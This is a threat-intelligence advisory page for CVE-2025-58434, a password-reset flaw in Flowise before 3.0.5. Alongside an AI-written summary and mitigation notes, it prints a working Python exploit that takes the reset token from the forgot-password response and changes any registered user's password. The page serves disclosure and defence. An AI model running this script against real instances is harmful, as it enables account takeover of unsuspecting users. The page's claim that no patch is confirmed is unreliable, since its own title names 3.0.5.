Flowise < 3.0.5 - Missing Authentication for Critical Function
Flowise versions prior to 3. 0. 5 contain a vulnerability where critical functions lack proper authentication. This flaw allows an attacker to reset a user's password by exploiting the forgot-password and reset-password API endpoints without valid authentication. Exploit code is publicly available in Python, demonstrating how to change a registered user's password by leveraging a temporary token returned by the forgot-password endpoint.
AI Analysis
Technical Summary
The vulnerability identified as CVE-2025-58434 affects Flowise versions before 3.0.5. It involves missing authentication controls on critical account management functions, specifically the password reset process. An attacker can initiate a password reset request for a registered email, receive a temporary token in the response, and then use that token to set a new password without further authentication. This bypasses normal security controls intended to protect user accounts. The exploit is implemented in Python and interacts with the API endpoints /api/v1/account/forgot-password and /api/v1/account/reset-password to perform the attack.
Potential Impact
Successful exploitation allows an attacker to change the password of any registered user without prior authentication, potentially leading to unauthorized account takeover. This compromises user account integrity and could lead to further unauthorized actions within the affected system. There is no indication from the data that exploitation is currently observed in the wild.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Since no official patch or fix information is provided, users of Flowise should monitor the vendor's official channels for updates. Until a fix is available, restricting access to the affected API endpoints and implementing additional authentication or verification steps for password resets may help mitigate risk.
Indicators of Compromise
- exploit-code: # Exploit Title: Flowise < 3.0.5 - Missing Authentication for Critical Function # Date: 10/11/2025 # Exploit Author: [nltt0] (https://github.com/nltt-br)) # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise # Version: < 3.0.5 # CVE: CVE-2025-58434 from requests import post from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ __/ | |___/ by nltt0 """ print(banner) try: parser = ArgumentParser(description='CVE-2025-58434 [FlowiseAI < 3.0.5]', usage="python CVE-2025-58434.py --email xtz@local --newpassword Test@2025 --url http://localhost:3000") parser.add_argument('-e', '--email', required=True, help='Registered email') parser.add_argument('-p', '--newpassword', required=True) parser.add_argument('-u', '--url', required=True) args = parser.parse_args() email = args.email password = args.newpassword url = args.url headers = { 'Content-Type': 'application/json' } data = { 'user': {'email': email} } url_format1 = '{}/api/v1/account/forgot-password'.format(url) req = post(url_format1, headers=headers, json=data) if req.status_code == 201: req_json = req.json() temp_token = req_json['user']['tempToken'] data = { 'user': {'email': email, 'tempToken': temp_token, "password": password } } url_format2 = '{}/api/v1/account/reset-password'.format(url) req = post(url_format2, headers=headers, json=data) print('[x] Password changed') else: print('[x] Unregistered user') except Exception as e: print('Error in {}'.format(e))
Flowise < 3.0.5 - Missing Authentication for Critical Function
Description
Flowise versions prior to 3. 0. 5 contain a vulnerability where critical functions lack proper authentication. This flaw allows an attacker to reset a user's password by exploiting the forgot-password and reset-password API endpoints without valid authentication. Exploit code is publicly available in Python, demonstrating how to change a registered user's password by leveraging a temporary token returned by the forgot-password endpoint.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The vulnerability identified as CVE-2025-58434 affects Flowise versions before 3.0.5. It involves missing authentication controls on critical account management functions, specifically the password reset process. An attacker can initiate a password reset request for a registered email, receive a temporary token in the response, and then use that token to set a new password without further authentication. This bypasses normal security controls intended to protect user accounts. The exploit is implemented in Python and interacts with the API endpoints /api/v1/account/forgot-password and /api/v1/account/reset-password to perform the attack.
Potential Impact
Successful exploitation allows an attacker to change the password of any registered user without prior authentication, potentially leading to unauthorized account takeover. This compromises user account integrity and could lead to further unauthorized actions within the affected system. There is no indication from the data that exploitation is currently observed in the wild.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Since no official patch or fix information is provided, users of Flowise should monitor the vendor's official channels for updates. Until a fix is available, restricting access to the affected API endpoints and implementing additional authentication or verification steps for password resets may help mitigate risk.
Technical Details
- Edb Id
- 52557
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Flowise < 3.0.5 - Missing Authentication for Critical Function
# Exploit Title: Flowise < 3.0.5 - Missing Authentication for Critical Function # Date: 10/11/2025 # Exploit Author: [nltt0] (https://github.com/nltt-br)) # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise # Version: < 3.0.5 # CVE: CVE-2025-58434 from requests import post from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __... (1639 more characters)
Threat ID: 6a0548c6cbff5d86105cd3b6
Added to database: 5/14/2026, 4:00:06 AM
Last enriched: 5/14/2026, 4:00:24 AM
Last updated: 5/14/2026, 6:27:36 AM
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.